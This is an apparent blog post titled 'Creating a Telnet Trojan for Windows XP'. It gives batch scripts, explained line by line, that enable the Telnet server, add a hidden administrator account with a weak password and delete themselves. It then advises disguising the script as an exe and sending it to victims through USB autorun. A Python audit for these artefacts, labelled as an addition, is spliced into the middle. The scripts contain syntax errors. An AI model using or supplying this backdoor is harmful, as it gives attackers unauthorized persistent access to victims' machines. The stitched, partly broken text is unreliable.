Sunday 14 October 2012

Creating a Telnet Trojan for Windows XP


The following batch script will act as a Telnet Trojan on any Windows XP system; the best
part of it is that it is fully undetectable to all anti-virus programs. Copy the following lines into
Notepad and save the file with any name and a .bat extension, for example Trojan.bat.
Code:

@echo off
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user h4xor_(od3/add
net user h4xor_(od3 12345
net localgroup administrators h4xor_(od3 /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v h4xor_(od3l /t
REG_DWORD /d 00000000
del trojan.bat
The first line turns command echo off.
The second line configures Windows to start the Telnet server every time the system starts.
The third line starts the Telnet server immediately.
The fourth line removes NTLM from the Telnet server's security settings.
The fifth line sets the Telnet server to stream mode.
The sixth and seventh lines add a user named h4xor_(od3 with the password 12345.
The eighth line adds h4xor_(od3 to the Administrators group.
The ninth line asks the system to hide the existence of the user h4xor_(od3.
The tenth line deletes the Trojan script from the victim's system.
You can replace the word h4xor_(od3 with a user name of your choice.
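The changes this script makes leave two host-level artefacts an administrator can look for: an account hidden through the SpecialAccounts\UserList key, and the tlntsvr service switched to automatic start. The Python below is an added defender-side check, not part of the original post: it parses the text output of "reg query" on that key and of "sc qc tlntsvr" (constructed sample output is embedded so it runs offline) and reports both conditions.

```python
import re

# Constructed sample output (not from a real host) of:
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
SAMPLE_USERLIST = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    h4xor_(od3    REG_DWORD    0x0
    SupportAccount    REG_DWORD    0x0
    Guest    REG_DWORD    0x1
"""
# Constructed sample output of:  sc qc tlntsvr
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: tlntsvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\WINDOWS\system32\tlntsvr.exe
"""
# One UserList value line: "<name>  REG_DWORD  0x<hex>"; the name may contain spaces.
USERLIST_LINE = re.compile(r"^\s+(\S.*?)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")

def hidden_accounts(reg_output):
    """Names whose UserList DWORD is 0, i.e. hidden from the logon screen."""
    hidden = []
    for line in reg_output.splitlines():
        m = USERLIST_LINE.match(line)
        if m and int(m.group(2), 16) == 0:
            hidden.append(m.group(1))
    return hidden

def telnet_autostart(sc_output):
    """True when 'sc qc tlntsvr' reports START_TYPE 2 (AUTO_START)."""
    m = re.search(r"START_TYPE\s*:\s*(\d+)", sc_output)
    return m is not None and int(m.group(1)) == 2

def audit(reg_output, sc_output, allowlist=()):
    """Findings for the two persistence artefacts this script leaves behind;
    allowlist names hidden accounts the administrator already knows about."""
    findings = []
    for name in hidden_accounts(reg_output):
        if name not in allowlist:
            findings.append("hidden local account in SpecialAccounts\\UserList: " + name)
    if telnet_autostart(sc_output):
        findings.append("Telnet server (tlntsvr) set to automatic start")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_USERLIST, SAMPLE_SC_QC, allowlist=("SupportAccount",)):
        print("FINDING:", finding)
```

On a live machine, feed the real output of the two commands to audit() instead of the samples; on Vista and later the same key and service name apply once the Telnet server feature is installed.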
Now you might ask why the above script will not work on Windows Vista and
Windows 7. That is because, by default, Vista and 7 do not install the Telnet packages.
To make the above script work on them you have to add some more lines, but the
victim system must be connected to the internet while the script runs.
Code:
@echo off
pkgmgr /iu:“TelnetClient”
pkgmgr /iu:“TelnetServer”
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM

tlntadmn config mode=stream
net user h4xor_(od3/add
net user h4xor_(od3 12345
net localgroup administrators h4xor_(od3 /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v h4xor_(od3 /t
REG_DWORD /d 00000000
Now note that the above script will only work if it is run with administrative privileges. That
means that if the user account is not an administrator, it will not work. After running this
script you can connect to the victim from any platform that has a Telnet client by typing the
following command.
C:\>telnet <victim's IP address>
The above script is a very basic example of how to make a Telnet Trojan; you can
modify the scripts according to your needs, but there is still a problem with the above
script. Since it is a batch script, a command window will surely pop up. To tackle that problem, download
Hidden Bat2EXE maker and convert the script into an executable file, copy it to a pen drive, create
an autorun.inf for your script there, and send it to your victim.